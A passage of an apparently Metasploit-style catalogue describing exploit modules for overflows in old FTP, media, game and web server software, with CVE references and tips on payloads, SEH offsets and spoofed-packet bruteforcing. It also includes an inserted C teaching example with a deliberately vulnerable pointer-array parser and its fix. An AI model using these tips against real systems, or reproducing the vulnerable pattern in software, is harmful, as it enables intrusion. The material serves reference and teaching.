This module exploits a stack-based buffer overflow in EZB Systems, Inc's UltraISO. When processing .CUE files, data is read from file into a fixed-size stack buffer. Since no bounds checking is done, a buffer overflow can occur. Attackers can execute arbitrary code by convincing their victim to open a CUE file. NOTE: A file with the same base name, but the extension of "bin" must also exist. Opening either file will trigger the vulnerability, but the files must both exist. CVE-2007-2888 OSVDB-36570 BID-24140 http://www.exploit-db.com/exp...

URSoft W32Dasm Disassembler Function Buffer Overflow
This module exploits a buffer overflow in W32Dasm <= v8.93. By creating a malicious file and convincing a user to disassemble the file with a vulnerable version of W32Dasm, the Imports/Exports function is copied to the stack and arbitrary code may be executed locally as the user. CVE-2005-0308 OSVDB-13169 BID-12352 http://aluigi.altervista.org/...

VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow
This module exploits a stack-based buffer overflow in VariCAD 2010-2.05 EN. An attacker must send the file to the victim and the victim must open the file. OSVDB-63067 BID-38815 http://www.exploit-db.com/exp...

VideoLAN VLC TiVo Buffer Overflow
This module exploits a buffer overflow in VideoLAN VLC 0.9.4. By creating a malicious TY file, a remote attacker could overflow a buffer and execute arbitrary code. CVE-2008-4654 OSVDB-49181 BID-31813

VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow
This module exploits a stack-based buffer overflow in the Win32AddConnection function of the VideoLAN VLC media player. Versions 0.9.9 through 1.0.1 are reportedly affected. This vulnerability is only present in Win32 builds of VLC. This exploit was found to work with the windows/exec and windows/meterpreter/reverse_tcp payloads. However, the windows/meterpreter/reverse_ord_tcp payload was found not to work. BID-35500 OSVDB-55509 CVE-2009-2484 http://git.videolan.org/?p=vl... http://milw0rm.com/exploits/9209 http://www.exploit-db.com/exp...

VUPlayer CUE Buffer Overflow
This module exploits a stack overflow in VUPlayer <= 2.49. When the application is used to open a specially crafted cue file, a buffer is overwritten allowing for the execution of arbitrary code. OSVDB-64581 BID-33960

VUPlayer M3U Buffer Overflow
This module exploits a stack overflow in VUPlayer <= 2.49. When the application is used to open a specially crafted m3u file, a buffer is overwritten allowing for the execution of arbitrary code. CVE-2006-6251 OSVDB-31710

Xenorate 2.50 (.xpl) universal Local Buffer Overflow Exploit (SEH)
This module exploits a stack buffer overflow in Xenorate 2.50. By creating a specially crafted xpl file, an attacker may be able to execute arbitrary code. OSVDB-57162 http://www.exploit-db.com/exp...

Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow
This module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1. An attacker must send the file to the victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded PLS file within a browser, when the PLS extension is registered to Zinf. This functionality has not been tested in this module. CVE-2004-0964 OSVDB-10416 http://www.milw0rm.com/exploi... BID-11248

ISS PAM.dll ICQ Parser Buffer Overflow
This module exploits a stack buffer overflow in the ISS products that use the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation will result in arbitrary code execution as LocalSystem. This exploit only requires 1 UDP packet, which can be both spoofed and sent to a broadcast address. The ISS exception handler will recover the process after each overflow, giving us the ability to bruteforce the service and exploit it multiple times. CVE-2004-0362 OSVDB-4355 http://www.eeye.com/html/Rese... http://xforce.iss.net/xforce/...

Kerio Firewall 2.1.4 Authentication Packet Overflow
This module exploits a stack buffer overflow in Kerio Personal Firewall administration authentication process. This module has only been tested against Kerio Personal Firewall 2 (2.1.4). CVE-2003-0220 OSVDB-6294 BID-7180 http://www1.corest.com/common...

3Com 3CDaemon 2.0 FTP Username Overflow
This module exploits a vulnerability in the 3Com 3CDaemon FTP service. This package is being distributed from the 3Com web site and is recommended in numerous support documents. This module uses the USER command to trigger the overflow. CVE-2005-0277 OSVDB-12810 OSVDB-12811 BID-12155 ftp://ftp.3com.com/pub/utilbi...

Cesar FTP 0.99g MKD Command Buffer Overflow
This module exploits a stack buffer overflow in the MKD verb in CesarFTP 0.99g. You must have valid credentials to trigger this vulnerability. Also, you only get one chance, so choose your target carefully. CVE-2006-2961 OSVDB-26364 BID-18586 http://secunia.com/advisories...

BolinTech Dream FTP Server 1.02 Format String
This module exploits a format string overflow in the BolinTech Dream FTP Server version 1.02. Based on the exploit by SkyLined. CVE-2004-2074 OSVDB-4986 BID-9800 http://www.milw0rm.com/exploi...

Easy File Sharing FTP Server 2.0 PASS Overflow
This module exploits a stack buffer overflow in the Easy File Sharing 2.0 service. By sending an overly long password, an attacker can execute arbitrary code. CVE-2006-3952 OSVDB-27646 BID-19243

EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow
This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11 and earlier. EasyFTP fails to check input size when parsing 'CWD' commands, which leads to a stack based buffer overflow. EasyFTP allows anonymous access by default; valid credentials are typically unnecessary to exploit this vulnerability. After version 1.7.0.12, this package was renamed "UplusFtp". This exploit utilizes a small piece of code that I've referred to as 'fixRet'. This code allows us to inject a payload of ~500 bytes into a 264 byte buffer by 'fixing' the return address post-exploitation. See references for more information. OSVDB-62134 http://paulmakowski.wordpress... http://paulmakowski.wordpress... http://seclists.org/bugtraq/2... http://code.google.com/p/easy... https://tegosecurity.com/etc/... http://www.securityfocus.com/...

EasyFTP Server <= 1.7.0.11 LIST Command Stack Buffer Overflow
This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11. Credit goes to Karn Ganeshan. NOTE: Although this is likely to exploit the same vulnerability as the 'easyftp_cwd_fixret' exploit, it uses a slightly different vector. OSVDB-62134 http://www.exploit-db.com/exp... http://www.exploit-db.com/exp...

EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow
This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11 and earlier. EasyFTP fails to check input size when parsing 'MKD' commands, which leads to a stack based buffer overflow. NOTE: EasyFTP allows anonymous access by default. However, in order to access the 'MKD' command, you must have access to an account that can create directories. After version 1.7.0.12, this package was renamed "UplusFtp". This exploit utilizes a small piece of code that I've referred to as 'fixRet'. This code allows us to inject a payload of ~500 bytes into a 264 byte buffer by 'fixing' the return address post-exploitation. See references for more information. OSVDB-62134 http://www.exploit-db.com/exp... http://www.exploit-db.com/exp...

FileCopa FTP Server pre 18 Jul Version
This module exploits the buffer overflow found in the LIST command in the fileCOPA FTP server (pre-18 Jul 2006 version), discovered by www.appsec.ch. CVE-2006-3726 OSVDB-27389 BID-19065

freeFTPd 1.0 Username Overflow
This module exploits a stack buffer overflow in the freeFTPd multi-protocol file transfer service. This flaw can only be exploited when logging has been enabled (non-default). CVE-2005-3683 OSVDB-20909 BID-15457 http://lists.grok.org.uk/pipe...

GlobalSCAPE Secure FTP Server Input Overflow
This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server. All versions prior to 3.0.3 are affected by this flaw. A valid user account (or anonymous access) is required for this exploit to work. CVE-2005-1415 OSVDB-16049 BID-13454 http://archives.neohapsis.com...

HTTPDX tolog() Function Format String Vulnerability
This module exploits a format string vulnerability in the HTTPDX FTP server. By sending a specially crafted FTP command containing format specifiers, an attacker can corrupt memory and execute arbitrary code. By default logging is off for HTTP, but enabled for the 'moderator' user via FTP. CVE-2009-4769 OSVDB-60181

LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow
This module exploits a buffer overflow in the LeapWare LeapFTP v2.7.3.600 client that is triggered through an excessively long PASV reply command. This module was ported from the original exploit by drG4njubas with minor improvements. CVE-2003-0558 OSVDB-4587 BID-7860 http://www.milw0rm.com/exploi...

Microsoft IIS FTP Server NLST Response Overflow
This module exploits a stack buffer overflow flaw in the Microsoft IIS FTP service. The flaw is triggered when a special NLST argument is passed while the session has changed into a long directory path. For this exploit to work, the FTP server must be configured to allow write access to the file system (either anonymously or in conjunction with a real account). http://milw0rm.com/exploits/9541 CVE-2009-3023 OSVDB-57589 BID-36189

NetTerm NetFTPD USER Buffer Overflow
This module exploits a vulnerability in the NetTerm NetFTPD application. This package is part of the NetTerm package. This module uses the USER command to trigger the overflow. CVE-2005-1323 OSVDB-15865 http://seclists.org/lists/ful... BID-13396

Oracle 9i XDB FTP PASS Overflow (win32)
By passing an overly long string to the PASS command, a stack based buffer overflow occurs. David Litchfield has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB) during a seminar on "Variations in exploit methods between Linux and Windows" presented at the Blackhat conference. CVE-2003-0727 OSVDB-2449 BID-8375 http://www.blackhat.com/prese...

Oracle 9i XDB FTP UNLOCK Overflow (win32)
By passing an overly long token to the UNLOCK command, a stack based buffer overflow occurs. David Litchfield has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB) during a seminar on "Variations in exploit methods between Linux and Windows" presented at the Blackhat conference. Oracle9i includes a number of default accounts, including dbsnmp:dbsmp, scott:tiger, system:manager, and sys:change_on_install. CVE-2003-0727 OSVDB-2449 BID-8375 http://www.blackhat.com/prese...

ProFTP 2.9 Banner Remote Buffer Overflow Exploit
This module exploits a buffer overflow in the ProFTP 2.9 client that is triggered through an excessively long welcome message. CVE-2009-3976 OSVDB-57394 http://www.labtam-inc.com/ind...

KarjaSoft Sami FTP Server v2.02 USER Overflow
This module exploits the KarjaSoft Sami FTP Server version 2.02 by sending an excessively long USER string. The stack is overwritten when the administrator attempts to view the FTP logs. Therefore, this exploit is passive and requires end-user interaction. Keep this in mind when selecting payloads. When the server is restarted, it will re-execute the exploit until the logfile is manually deleted via the file system. CVE-2006-0441 CVE-2006-2212 OSVDB-25670 BID-16370 BID-22045 BID-17835 http://www.milw0rm.com/exploi... http://www.milw0rm.com/exploi... http://www.milw0rm.com/exploi... http://www.milw0rm.com/exploi... http://www.milw0rm.com/exploi...

Sasser Worm avserve FTP PORT Buffer Overflow
This module exploits the FTP server component of the Sasser worm. By sending an overly long PORT command the stack can be overwritten. OSVDB-6197

Serv-U FTPD MDTM Overflow
This is an exploit for Serv-U's MDTM command timezone overflow. It has been heavily tested against versions 4.0.0.4/4.1.0.0/4.1.0.3/5.0.0.0 with success against nt4/2k/xp/2k3. I have also had success against version 3, but only tested 1 version/os. The bug is in all versions prior to 5.0.0.4, but this exploit will not work against versions not listed above. You only get one shot, but it should be OS/SP independent. This exploit is a single hit, the service dies after the shellcode finishes execution. CVE-2004-0330 OSVDB-4073 http://archives.neohapsis.com... http://www.cnhonker.com/advis... http://www.cnhonker.com/index... BID-9751

SlimFTPd LIST Concatenation Overflow
This module exploits a stack buffer overflow in the SlimFTPd server. The flaw is triggered when a LIST command is received with an overly-long argument. This vulnerability affects all versions of SlimFTPd prior to 3.16 and was discovered by Raphael Rigo. CVE-2005-2373 OSVDB-18172 BID-14339

Trellian FTP Client 3.01 PASV Remote Buffer Overflow
This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered through an excessively long PASV message. CVE-2010-1465 OSVDB-63812 http://www.exploit-db.com/exp...

Vermillion FTP Daemon PORT Command Memory Corruption
This module exploits an out-of-bounds array access in the Arcane Software Vermillion FTP server. By sending a specially crafted FTP PORT command, an attacker can corrupt stack memory and execute arbitrary code. This particular issue is caused by processing data bound by attacker controlled input while writing into a 4 byte stack buffer. Unfortunately, the writing that occurs is not a simple byte copy. Processing is done using a source pointer (p) and a destination pointer (q). The vulnerable function walks the input string and continues while the source byte is non-null. If a comma is encountered, the function increments the destination pointer. If an ascii digit [0-9] is encountered, the following occurs: *q = (*q * 10) + (*p - '0'); All other input characters are ignored in this loop. As a consequence, an attacker must craft input such that modifications to the current values on the stack result in usable values. In this exploit, the low two bytes of the return address are adjusted to point at the location of a 'call edi' instruction within the binary. This was chosen since 'edi' points at the source buffer when the function returns. NOTE: This server can be installed as a service using "vftpd.exe install". If so, the service does not restart automatically, giving an attacker only one attempt. OSVDB-62163 http://www.exploit-db.com/exp... http://www.global-evolution.i...

War-FTPD 1.65 Password Overflow
This exploits the buffer overflow found in the PASS command in War-FTPD 1.65. This particular module will only work reliably against Windows 2000 targets. The server must be configured to allow anonymous logins for this exploit to succeed. A failed attempt will bring down the service completely. CVE-1999-0256 OSVDB-875 BID-10078 http://lists.insecure.org/lis...

War-FTPD 1.65 Username Overflow
This module exploits a buffer overflow found in the USER command of War-FTPD 1.65. CVE-1999-0256 OSVDB-875 BID-10078 http://lists.insecure.org/lis...

Texas Imperial Software WFTPD 3.23 SIZE Overflow
This module exploits a buffer overflow in the SIZE verb in Texas Imperial's Software WFTPD 3.23. CVE-2006-4318 OSVDB-28134 BID-19617

WS-FTP Server 5.03 MKD Overflow
This module exploits the buffer overflow found in the MKD command in IPSWITCH WS_FTP Server 5.03 discovered by Reed Arvin. CVE-2004-1135 OSVDB-12509 BID-11772

Ipswitch WS_FTP Server 5.05 XMD5 Overflow
This module exploits a buffer overflow in the XMD5 verb in IPSWITCH WS_FTP Server 5.05. CVE-2006-4847 OSVDB-28939 BID-20076

Xftp FTP Client 3.0 PWD Remote Buffer Overflow Exploit
This module exploits a buffer overflow in the Xftp 3.0 FTP client that is triggered through an excessively long PWD message. OSVDB-63968 http://www.exploit-db.com/exp...

Xlink FTP Client Buffer Overflow
This module exploits a stack buffer overflow in Xlink FTP Client 32 Version 3.01 that comes bundled with Omni-NFS Enterprise 5.2. When an overly long FTP server response is received by a client, arbitrary code may be executed. CVE-2006-5792 OSVDB-33969 http://www.metasploit.com/ http://www.xlink.com

Xlink FTP Server Buffer Overflow
This module exploits a stack buffer overflow in Xlink FTP Server that comes bundled with Omni-NFS Enterprise 5.2. When an overly long FTP request is sent to the server, arbitrary code may be executed. CVE-2006-5792 OSVDB-58646 http://www.metasploit.com/ http://www.xlink.com

Medal Of Honor Allied Assault getinfo Stack Buffer Overflow
This module exploits a stack based buffer overflow in the getinfo command of Medal Of Honor Allied Assault. CVE-2004-0735 OSVDB-8061 http://www.milw0rm.com/exploi... BID-10743

Racer v0.5.3 beta 5 Buffer Overflow
This module exploits the Racer Car and Racing Simulator game versions v0.5.3 beta 5 and earlier. Both the client and server listen on UDP port 26000. By sending an overly long buffer we are able to execute arbitrary code remotely. CVE-2007-4370 OSVDB-39601 http://www.milw0rm.com/exploi... BID-25297

Unreal Tournament 2004 "secure" Overflow (Win32)
This is an exploit for the GameSpy secure query in the Unreal Engine. This exploit only requires one UDP packet, which can be both spoofed and sent to a broadcast address. Usually, the GameSpy query server listens on port 7787, but you can manually specify the port as well. The RunServer.sh script will automatically restart the server upon a crash, giving us the ability to bruteforce the service and exploit it multiple times. CVE-2004-0608 OSVDB-7217 BID-10570

Adobe RoboHelp Server 8 Arbitrary File Upload and Execute
This module exploits an authentication bypass vulnerability which allows remote attackers to upload and execute arbitrary code. CVE-2009-3068 OSVDB-57896 http://www.intevydis.com/blog... http://www.zerodayinitiative....

Alt-N SecurityGateway username Buffer Overflow
Alt-N SecurityGateway is prone to a buffer overflow condition. This is due to insufficient bounds checking on the "username" parameter. Successful exploitation could result in code execution with SYSTEM level privileges. NOTE: This service doesn't restart; you'll only get one shot. However, it often survives a successful exploitation attempt. CVE-2008-4193 OSVDB-45854 BID-29457

Alt-N WebAdmin USER Buffer Overflow
Alt-N WebAdmin is prone to a buffer overflow condition. This is due to insufficient bounds checking on the USER parameter. Successful exploitation could result in code execution with SYSTEM level privileges. CVE-2003-0471 OSVDB-2207 BID-8024 NSS-11771

Apache Win32 Chunked Encoding
This module exploits the chunked transfer integer wrap vulnerability in Apache version 1.2.x to 1.3.24. This particular module has been tested with all versions of the official Win32 build between 1.3.9 and 1.3.24. Additionally, it should work against most co-branded and bundled versions of Apache (Oracle 8i, 9i, IBM HTTPD, etc). You will need to use the Check() functionality to determine the exact target version prior to launching the exploit. The version of Apache bundled with Oracle 8.1.7 will not automatically restart, so if you use the wrong target value, the server will crash. CVE-2002-0392 OSVDB-838 BID-5033 http://lists.insecure.org/lis...

Apache module mod_rewrite LDAP protocol Buffer Overflow
This module exploits the mod_rewrite LDAP protocol scheme handling flaw discovered by Mark Dowd, which produces an off-by-one overflow. Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable. This module requires REWRITEPATH to be set accurately. In addition, the target must have 'RewriteEngine on' configured, with a specific 'RewriteRule' condition enabled to allow for exploitation. The flaw affects multiple platforms; however, this module currently only supports Windows based installations. CVE-2006-3747 OSVDB-27588 BID-19204 http://archives.neohapsis.com... http://www.milw0rm.com/exploi... http://www.milw0rm.com/exploi... http://www.milw0rm.com/exploi...

Apache mod_jk 1.2.20 Buffer Overflow
This is a stack buffer overflow exploit for mod_jk 1.2.20. Should work on any Win32 OS. CVE-2007-0774 OSVDB-33855 BID-22791 http://www.zerodayinitiative....

BadBlue 2.5 EXT.dll Buffer Overflow
This is a stack buffer overflow exploit for BadBlue version 2.5. CVE-2005-0595 OSVDB-14238 BID-7387

BadBlue 2.72b PassThru Buffer Overflow
This module exploits a stack buffer overflow in the PassThru functionality in ext.dll in BadBlue 2.72b and earlier. CVE-2007-6377 OSVDB-42416 BID-26803

BEA WebLogic JSESSIONID Cookie Value Overflow
This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable code is only accessible when clustering is configured. A request containing a long JSESSIONID cookie value can lead to arbitrary code execution. CVE-2008-5457 OSVDB-51311

BEA Weblogic Transfer-Encoding Buffer Overflow
This module exploits a stack based buffer overflow in the BEA Weblogic Apache plugin. This vulnerability exists in the error reporting for unknown Transfer-Encoding headers. You may have to run this twice due to timing issues with handlers. CVE-2008-4008 OSVDB-49283 http://support.bea.com/applic...

Belkin Bulldog Plus Web Service Buffer Overflow
This module exploits a stack buffer overflow in Belkin Bulldog Plus 4.0.2 build 1219. When sending a specially crafted http request, an attacker may be able to execute arbitrary code. OSVDB-54395 BID-34033

CA iTechnology iGateway Debug Mode Buffer Overflow
This module exploits a vulnerability in the Computer Associates iTechnology iGateway component. When <Debug>True</Debug> is enabled in igateway.conf (non-default), it is possible to overwrite the stack and execute code remotely. This module works best with Ordinal payloads. CVE-2005-3190 OSVDB-19920 http://www.ca.com/us/security... http://www.milw0rm.com/exploi... BID-15025

EasyFTP Server <= 1.7.0.11 list.html path Stack Buffer Overflow
This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11 and earlier. EasyFTP fails to check input size when parsing the 'path' parameter supplied to an HTTP GET request, which leads to a stack based buffer overflow. EasyFTP allows anonymous access by default; valid credentials are typically unnecessary to exploit this vulnerability. After version 1.7.0.12, this package was renamed "UplusFtp". Due to limited space, as well as difficulties using an egghunter, the use of staged, ORD, and/or shell payloads is recommended. OSVDB-66614 http://www.exploit-db.com/exp...

Novell eDirectory NDS Server Host Header Overflow
This module exploits a stack buffer overflow in Novell eDirectory 8.8.1. The web interface does not validate the length of the HTTP Host header prior to using the value of that header in an HTTP redirect. CVE-2006-5478 OSVDB-29993 BID-20655

eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow
This module exploits a stack buffer overflow in eDirectory 8.7.3 iMonitor service. This vulnerability was discovered by Peter Winter-Smith of NGSSoftware. NOTE: repeated exploitation attempts may cause eDirectory to crash. It does not restart automatically in a default installation. CVE-2005-2551 OSVDB-18703 BID-14548

EFS Easy Chat Server Authentication Request Handling Buffer Overflow
This module exploits a stack buffer overflow in EFS Software Easy Chat Server. By sending an overly long authentication request, an attacker may be able to execute arbitrary code. NOTE: The offset to SEH is influenced by the installation path of the program. The path, which defaults to "C:\Program Files\Easy Chat Server", is concatenated with "\users\" and the string passed as the username HTTP parameter. CVE-2004-2466 OSVDB-7416 BID-25328

Free Download Manager Remote Control Server Buffer Overflow
This module exploits a stack buffer overflow in Free Download Manager Remote Control 2.5 Build 758. When sending a specially crafted Authorization header, an attacker may be able to execute arbitrary code. CVE-2009-0183 OSVDB-51745

HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request, an attacker may be able to execute arbitrary code. CVE-2007-6204 OSVDB-39530 BID-26741

HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53. By sending a specially crafted CGI request to ovalarm.exe, an attacker can execute arbitrary code. This specific vulnerability is due to a call to "sprintf_new" in the "isWide" function within "ovalarm.exe". A stack buffer overflow occurs when processing an HTTP request that contains both of the following: an "Accept-Language" header longer than 100 bytes, and an "OVABverbose" URI variable set to "on", "true" or "1". The vulnerability is related to "_WebSession::GetWebLocale()". NOTE: This exploit has been tested successfully with a reverse_ord_tcp payload. CVE-2009-4179 OSVDB-60930 BID-37347 http://dvlabs.tippingpoint.co... http://h20000.www2.hp.com/biz...

HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication SEH Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager versions 7.53 and earlier. Specifically, this vulnerability is caused by a failure to properly handle user-supplied input within the HTTP request, including headers and the actual URL GET request. Exploitation is tricky due to character restrictions. It was necessary to utilize an egghunter shellcode, which was alphanumerically encoded by muts in the original exploit. If you plan on using this exploit for a remote shell, you will likely want to migrate to a different process as soon as possible: any connections get reset after a short period of time, probably by some timeout handling code. CVE-2008-1697 OSVDB-43992 BID-28569

HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request to OvWebHelp.exe, an attacker may be able to execute arbitrary code. CVE-2009-4178 OSVDB-60929 BID-37340

HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request to Snmp.exe, an attacker may be able to execute arbitrary code. CVE-2009-3849 OSVDB-60933

HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute arbitrary code. CVE-2008-0067 OSVDB-53222 BID-33147

Hewlett-Packard Power Manager Administration Buffer Overflow
This module exploits a stack buffer overflow in Hewlett-Packard Power Manager 4.2. Sending a specially crafted POST request with an overly long Login string, an attacker may be able to execute arbitrary code. CVE-2009-2685 OSVDB-59684

HTTPDX h_handlepeer() Function Buffer Overflow
This module exploits a stack-based buffer overflow vulnerability in HTTPDX HTTP server 1.4. The vulnerability is caused due to a boundary error within the "h_handlepeer()" function in http.cpp. By sending an overly long HTTP request, an attacker can overrun a buffer and execute arbitrary code. OSVDB-58714 CVE-2009-3711 http://www.pank4j.com/exploit... http://www.rec-sec.com/2009/1...

HTTPDX tolog() Function Format String Vulnerability
This module exploits a format string vulnerability in HTTPDX HTTP server. By sending a specially crafted HTTP request containing format specifiers, an attacker can corrupt memory and execute arbitrary code. By default logging is off for HTTP, but enabled for the 'moderator' user via FTP. CVE-2009-4769 OSVDB-60182

IA WebMail 3.x Buffer Overflow
This exploits a stack buffer overflow in the IA WebMail server. This exploit has not been tested against a live system at this time. CVE-2003-1192 OSVDB-2757 BID-8965 http://www.k-otik.net/exploit...

IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow
This is a stack buffer overflow exploit for IBM Tivoli Provisioning Manager for OS Deployment version 5.1.0.X. CVE-2007-1868 OSVDB-34678 BID-23264 http://dvlabs.tippingpoint.co...

IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3). By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code. CVE-2007-4880 OSVDB-38161 BID-25743

Icecast (<= 2.0.1) Header Overwrite (win32)
This module exploits a buffer overflow in the header parsing of icecast, discovered by Luigi Auriemma. Sending 32 HTTP headers will cause a write one past the end of a pointer array. On win32 this happens to overwrite the saved instruction pointer, and on linux (depending on compiler, etc) this seems to generally overwrite nothing crucial (read: not exploitable). NOTE: This exploit uses ExitThread(), which leaves icecast thinking the thread is still in use, so the thread counter is never decremented. Each time your payload exits, the counter stays incremented, and eventually the threadpool limit will be maxed. So you can multihit, but only until you fill the threadpool. CVE-2004-1561 OSVDB-10406 BID-11271 http://archives.neohapsis.com...
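
The "one past the end of a pointer array" the icecast entry describes is the classic store-then-check off-by-one. The C below is an added example written for this page, not icecast's code: a request splitter that stores each line pointer into a fixed-size array and only then tests the count, next to the corrected ordering. MAX_LINES, the function names and the constructed request builder are assumptions; the demo hands the vulnerable parser one spare slot so the extra store can be observed without corrupting memory.

```c
/* Added example of a store-then-check pointer-array overrun; not icecast's code. */
#include <stdio.h>
#include <string.h>

#define MAX_LINES 32   /* assumed: slots for the request line plus headers */

/* Constructed sample input: request line, nheaders headers, blank terminator. */
int build_request(char *out, size_t outsz, int nheaders)
{
    int n = snprintf(out, outsz, "GET / HTTP/1.0\r\n");
    for (int i = 0; i < nheaders && (size_t)n < outsz; i++)
        n += snprintf(out + n, outsz - n, "X-Pad-%d: a\r\n", i);
    if ((size_t)n < outsz) n += snprintf(out + n, outsz - n, "\r\n");
    return n;
}

/* Vulnerable: the pointer is stored first and the count is tested with '>'
 * afterwards. The request line plus 'capacity' headers therefore perform
 * capacity + 1 stores, the last one at lines[capacity]. Returns the number
 * of stores so the overrun is visible to the caller. */
int split_lines_vulnerable(char *buf, char **lines, int capacity)
{
    int n = 0;
    char *p = buf;
    while (*p && strncmp(p, "\r\n", 2) != 0) {
        char *eol = strstr(p, "\r\n");
        lines[n++] = p;                 /* write happens before the check */
        if (eol == NULL) break;
        *eol = '\0';
        p = eol + 2;
        if (n > capacity) break;        /* n == capacity passes; next store overruns */
    }
    return n;
}

/* Fixed: refuse the line before storing it. Returns the line count, or -1
 * when the request carries more lines than there are slots. */
int split_lines_fixed(char *buf, char **lines, int capacity)
{
    int n = 0;
    char *p = buf;
    while (*p && strncmp(p, "\r\n", 2) != 0) {
        char *eol = strstr(p, "\r\n");
        if (n >= capacity) return -1;   /* check before the store */
        lines[n++] = p;
        if (eol == NULL) break;
        *eol = '\0';
        p = eol + 2;
    }
    return n;
}

/* Demo drivers: parse a request carrying nheaders headers with each parser. */
int stores_vulnerable(int nheaders)
{
    char buf[2048];
    char *slots[MAX_LINES + 1];   /* one spare slot absorbs the overrun */
    build_request(buf, sizeof buf, nheaders);
    return split_lines_vulnerable(buf, slots, MAX_LINES);
}

int lines_fixed(int nheaders)
{
    char buf[2048];
    char *slots[MAX_LINES];
    build_request(buf, sizeof buf, nheaders);
    return split_lines_fixed(buf, slots, MAX_LINES);
}

int main(void)
{
    printf("vulnerable: 31 headers -> %d stores, 32 headers -> %d stores (array has %d slots)\n",
           stores_vulnerable(31), stores_vulnerable(32), MAX_LINES);
    printf("fixed:      31 headers -> %d lines,  32 headers -> %d (rejected)\n",
           lines_fixed(31), lines_fixed(32));
    return 0;
}
```

With the request line occupying one slot, exactly 32 headers is what pushes the store to index 32, matching the trigger count in the entry; on a real stack that slot is whatever sits after the array, which is why the outcome differs between the win32 and linux builds.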

InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow
This module exploits a stack buffer overflow in InterSystems Cache 2009.1. By sending a specially crafted GET request, an attacker may be able to execute arbitrary code. OSVDB-60549 BID-37177

Ipswitch WhatsUp Gold 8.03 Buffer Overflow
This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By posting a long string for the value of 'instancename' in the _maincfgret.cgi script an attacker can overflow a buffer and execute arbitrary code on the system. CVE-2004-0798 OSVDB-9177 BID-11043

MailEnable Authorization Header Buffer Overflow
This module exploits a remote buffer overflow in the MailEnable web service. The vulnerability is triggered when a large value is placed into the Authorization header of the web request. MailEnable Enterprise Edition versions prior to 1.0.5 and MailEnable Professional versions prior to 1.55 are affected. CVE-2005-1348 OSVDB-15913 OSVDB-15737 BID-13350 NSS-18123

MaxDB WebDBM Database Parameter Overflow
This module exploits a stack buffer overflow in the MaxDB WebDBM service. By sending a specially crafted HTTP request that contains an overly long database name, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the wahttp process. This module has been tested against MaxDB 7.6.00.16 and MaxDB 7.6.00.27. CVE-2006-4305 OSVDB-28300 BID-19660

MaxDB WebDBM GET Buffer Overflow
This module exploits a stack buffer overflow in the MaxDB WebDBM service. This service is included with many recent versions of the MaxDB and SAPDB products. This particular module is capable of exploiting Windows systems through the use of an SEH frame overwrite. The offset to the SEH frame may change depending on where MaxDB has been installed, this module assumes a web root path with the same length as: C:\Program Files\sdb\programs\web\Documents CVE-2005-0684 OSVDB-15816 http://www.idefense.com/appli... BID-13368

McAfee ePolicy Orchestrator / ProtectionPilot Overflow
This is an exploit for the McAfee HTTP Server (NAISERV.exe). McAfee ePolicy Orchestrator 2.5.1 through 3.5.0 and ProtectionPilot 1.1.0 are known to be vulnerable. By sending a large 'Source' header, the stack can be overwritten. This module is based on the exploit by xbxice and muts. Due to size constraints, this module uses the Egghunter technique. You may wish to adjust WfsDelay appropriately. CVE-2006-5156 OSVDB-29421 http://www.milw0rm.com/exploi... http://www.remote-exploit.org... BID-20288

MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow
This module exploits a stack buffer overflow in Alt-N MDaemon SMTP server for versions 6.8.5 and earlier. When WorldClient HTTP server is installed (default), a CGI script is provided to accept html FORM based emails and deliver via MDaemon.exe, by writing the CGI output to the Raw Queue. When X-FromCheck is enabled (also default), the temporary form2raw.cgi data is copied by MDaemon.exe and a stack based overflow occurs when an excessively long From field is specified. The RawQueue is processed every 1 minute by default, to a maximum of 60 minutes. Keep this in mind when choosing payloads or setting WfsDelay... You'll need to wait. Furthermore, this exploit uses a direct memory jump into a nopsled (which isn't very reliable). Once the payload is written into the Raw Queue by Form2Raw, MDaemon will continue to crash/execute the payload until the CGI output is manually deleted from the queue in C:\MDaemon\RawFiles\*.raw. CVE-2003-1200 OSVDB-3255 BID-9317

Minishare 1.4.1 Buffer Overflow
